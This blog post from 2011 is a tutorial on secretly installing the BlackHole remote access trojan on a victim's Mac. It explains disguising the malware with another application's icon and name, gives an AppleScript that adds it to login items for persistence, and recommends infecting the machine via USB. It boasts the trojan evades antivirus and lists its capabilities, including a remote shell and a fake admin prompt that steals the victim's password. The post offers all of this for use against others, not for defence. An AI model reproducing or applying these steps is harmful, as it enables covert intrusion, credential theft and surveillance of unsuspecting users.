Wednesday, December 21, 2011

[TuT] How to successfully RAT a Mac [Detailed]

So this will be a Tutorial about RATing a MAC. I write this Tutorial because there are not so much tutorials out there for Mac users. I hope i can help you with this

The first step is to get the RAT you want to install on the Victims Machine.

Step 1: Finding the RAT

I know 2 RATs for OSX which are really good.

1. Hell Raiser 4.2
2. BlackHole RAT


Here is the Tutorial for the Hell Raiser RAT: click

I will write a Tutorial on how to use the BlackHole RAT.

Download it from here: Mediafire

Step 2: Setting up the RAT

When you have downloaded the RAT, unpack it and copy it to your Desktop. DO NOT RUN THE SERVER!!!!
The Server will have the default App Icon. to change that, clinck on the Server and press cmd+i. An Information Window will pop up and in the left upper corner you will see the Icon. Now open up the information Window from another Application like Safari and click on the Icon in the corner, then press cmd+c.

When you have done that, click on the icon of the Server and hit cmd+v.

Now you can close the information Window and the Server shoul have the same icon as the the other Application.

You can also change the Name to something you want.

Step 3: Creating the Startup Script

If you want that the Server will be started on every Boot, you have to add it to the Startup Items. to do so, you can buil a simple Apple Script.

1. Open up Script Editor
2. Tipe in the following command:
set apppath to "/path/to/application.app"
tell application "System Events"
make login item at end with properties {path:apppath, hidden:false}
end tell

change "path/to/application.app" to the path where you will place the Server.
3. Save as Programm

Now when you have done that, you are finished with the setup of the RAT.

Step 4: Infecting the slave

Now there are many ways you can place the RAT on the victims Computer, but the best is over USB. So place the Server on a save place and run the AppleScript, then run the Server itself.

Now you have succsessfully infected the Mac Computer, the Server will run in the background, you can only kill it over the activitys Window. This RAT is FUD, no Virus System will be able to save your slave from it!

So go back to your Computer and run the Client. (Client works for Mac and Windows!!)

Step 5: Connecting to the Server

Run the Client, there will be a Noob-Protection. Enter "PassAufWasDuMachst!" without quotes and press "Let me in..."

Now you are in the mainwindow of the Client. Fill in the Victims IP Address and yours and click Connect.

Now you have the following functions:

- Shell (with the actually logged in User privileges)
- Open Webpage with default Web Browser
- Send a Message which will be displayed on the Victims Screen
- Create a Text file on the Victims Desktop
- Shutdown, Restart and Sleep
- Request Admin Login (This will display a faked request for Admin privileges and send you the name and password)

Here are some Pics:

The main Window:





More functions:

The sended Message:

The faked Admin login:


And here the Shell:


I hope i can help you with this. If you have any Questions to the BlackHole RAT feel free to Post them.

0 comments:

Post a Comment

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Online Project management